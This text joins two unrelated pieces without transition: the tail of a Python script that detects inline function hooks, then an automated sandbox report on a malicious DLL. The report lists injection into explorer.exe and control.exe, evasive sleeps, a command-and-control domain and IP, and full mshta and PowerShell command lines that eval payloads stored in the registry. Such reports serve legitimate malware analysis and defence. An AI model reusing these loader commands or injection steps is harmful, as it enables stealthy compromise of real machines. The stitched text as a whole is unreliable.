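    if len(code) >= 6 and code[0] == 0xFF and code[1] == 0x25:   # jmp [rip+disp32]
        return "jmp [rip+disp32]", (va + 6 + _rel32(code, 2)) & MASK64
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:   # push imm32; ret
        return "push/ret", struct.unpack_from("<I", code, 1)[0]
    if len(code) >= 12 and code[:2] == b"\x48\xB8" and code[10:12] == b"\xFF\xE0":
        return "mov rax/jmp rax", struct.unpack_from("<Q", code, 2)[0]
    return "unrecognized", None


def check_prologue(clean: bytes, live: bytes, va: int, n: int = 16) -> Dict:
    """Compare the first n bytes. Any difference means the prologue was
    rewritten in memory; decode_trampoline then says where it goes when the
    stub is a common shape, and 'unrecognized' otherwise (still a hook)."""
    clean, live = clean[:n], live[:n]
    changed = [i for i, (a, b) in enumerate(zip(clean, live)) if a != b]
    result = {"hooked": bool(changed), "first_changed_offset": None,
              "kind": None, "target": None}
    if changed:
        off = changed[0]
        result["first_changed_offset"] = off
        result["kind"], result["target"] = decode_trampoline(live[off:], va + off)
    return result


FUNCTION_VA = 0x7FF812345000                  # constructed address, not from the report
# mov [rsp+8],rbx ; push rdi ; sub rsp,20h ; mov rbx,rdx   (illustrative prologue)
CLEAN_PROLOGUE = bytes.fromhex("48895c2408574883ec20488bda")
SAMPLES = {
    "clean": CLEAN_PROLOGUE,
    "jmp rel32 +0x1000": b"\xE9\x00\x10\x00\x00" + CLEAN_PROLOGUE[5:],
    "jmp [rip+0x10]": b"\xFF\x25\x10\x00\x00\x00" + CLEAN_PROLOGUE[6:],
    "push/ret": b"\x68\x78\x56\x34\x12\xC3" + CLEAN_PROLOGUE[6:],
    "report bytes": bytes.fromhex("fff225500000") + CLEAN_PROLOGUE[6:],
}

if __name__ == "__main__":
    for name, live in SAMPLES.items():
        r = check_prologue(CLEAN_PROLOGUE, live, FUNCTION_VA)
        tgt = "0x%x" % r["target"] if r["target"] is not None else "-"
        print("%-20s hooked=%-5s kind=%-18s target=%s" % (name, r["hooked"], r["kind"], tgt))
```

Two caveats when running this against a real process. The clean bytes must come from the same build of the module as the one mapped in the process and, for 32-bit code, from an image to which the loader's relocations have been applied, otherwise absolute addresses in the prologue produce false differences. And a stub that does not match any of the patterns is still a modification: the report's six bytes fall into that case, and the right response is to dump the region and disassemble it rather than to treat the function as clean.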
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Disables application error messages (SetErrorMode)
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3982
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5223
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4708
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3874
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\y3j0hr41\y3j0hr41.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tangn2aw\tangn2aw.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3728 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3596 Thread sleep count: 4708 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6112 Thread sleep count: 3874 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5084 Thread sleep time: -5534023222112862s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04860F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_04860F53
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0484CA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_0484CA40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04859386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_04859386
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E0F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_053E0F53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053D9386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_053D9386
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053CCA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_053CCA40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04846457 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_04846457
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: mshta.exe, 00000019.00000003.397990029.00000152C52BA000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}h
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E231D62 LoadLibraryA,GetProcAddress, 0_2_6E231D62
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04853E8D ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 0_2_04853E8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053D3E8D ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 3_2_053D3E8D

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: gtr.antoinfer.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.228.233.17 80
Allocates memory in foreign processes
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: FA0000 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\y3j0hr41\y3j0hr41.0.cs
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 736E1580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 736E1580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3388 base: 10B8000 value: 00
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 4924
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF71E6A12E0
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: FA0000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF71E6A12E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 10B8000
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\beneficial.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tangn2aw\tangn2aw.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES7CE2.tmp' 'c:\Users\user\AppData\Local\Temp\kdz1kgtq\CSC3C6C006953954AC2BBB3EA5383F4311.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\y3j0hr41\y3j0hr41.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES92FA.tmp' 'c:\Users\user\AppData\Local\Temp\tangn2aw\CSCCFAE70CB50C649DC9230F2DAC50A036.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB25A.tmp' 'c:\Users\user\AppData\Local\Temp\4mppu3lx\CSC5D5E602DFAC54795936F9835A1D78A6E.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCF86.tmp' 'c:\Users\user\AppData\Local\Temp\y3j0hr41\CSC1BD10A2A5D864F59B6883896D7374BCD.TMP'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bn9l='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn9l).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>J7aj='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(J7aj).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
